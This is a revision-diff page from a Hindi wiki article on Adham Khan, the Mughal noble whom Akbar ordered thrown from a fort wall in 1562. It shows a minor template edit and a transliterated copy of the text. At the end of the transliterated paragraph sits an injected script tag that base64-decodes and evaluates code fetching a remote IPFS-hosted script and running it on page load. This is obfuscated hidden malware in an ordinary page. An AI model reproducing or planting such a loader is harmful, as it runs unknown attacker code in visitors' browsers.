Difference between revisions of "अदहम ख़ाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
अदहम ख़ाँ बादशाह [[अकबर]] की दूध माँ माहम अनगा का लड़का था। उसने अकबर को [[बैरम ख़ाँ]] के विरुद्ध करने के षड़यंत्र में भाग लिया और अकबर ने 1560 ई. में बैरम ख़ाँ को बर्ख़ास्त कर दिया। इसके बाद दो वर्ष तक अकबर पर अहमद ख़ाँ का भारी प्रभाव रहा। अकबर ने [[मालवा]] जीतने के लिए जो सेना भेजी, उसका प्रधान सेनापति अहमद ख़ाँ का बनाया। 1562 ई. में उसने शम्शुद्दीन [[अतगा ख़ाँ]] को, जिसे अकबर ने अपना मंत्री बनाया था, महल के अन्दर क़त्ल कर दिया। इससे बादशाह इतना नाराज़ हुआ कि उसने उसे क़िले की दीवार से नीचे फेंककर मार डालने का हुक़्म दिया।<ref>भारतीय इतिहास कोश पृष्ठ संख्या-07</ref>
+
अदहम ख़ाँ बादशाह [[अकबर]] की दूध माँ [[माहम अनगा]] का लड़का था। उसने अकबर को [[बैरम ख़ाँ]] के विरुद्ध करने के षड़यंत्र में भाग लिया और अकबर ने 1560 ई. में बैरम ख़ाँ को बर्ख़ास्त कर दिया। इसके बाद दो वर्ष तक अकबर पर अहमद ख़ाँ का भारी प्रभाव रहा। अकबर ने [[मालवा]] जीतने के लिए जो सेना भेजी, उसका प्रधान सेनापति अहमद ख़ाँ का बनाया। 1562 ई. में उसने शम्शुद्दीन [[अतगा ख़ाँ]] को, जिसे अकबर ने अपना मंत्री बनाया था, महल के अन्दर क़त्ल कर दिया। इससे बादशाह इतना नाराज़ हुआ कि उसने उसे क़िले की दीवार से नीचे फेंककर मार डालने का हुक़्म दिया।<ref>भारतीय इतिहास कोश पृष्ठ संख्या-07</ref>
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 13:20, 9 February 2011

adaham khaan badashah akabar ki doodh maan maham anaga ka l daka tha. usane akabar ko bairam khaan ke viruddh karane ke sh dayantr mean bhag liya aur akabar ne 1560 ee. mean bairam khaan ko barkhast kar diya. isake bad do varsh tak akabar par ahamad khaan ka bhari prabhav raha. akabar ne malava jitane ke lie jo sena bheji, usaka pradhan senapati ahamad khaan ka banaya. 1562 ee. mean usane shamshuddin ataga khaan ko, jise akabar ne apana mantri banaya tha, mahal ke andar qatl kar diya. isase badashah itana naraz hua ki usane use qile ki divar se niche pheankakar mar dalane ka huqm diya.[1] <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bharatiy itihas kosh prishth sankhya-07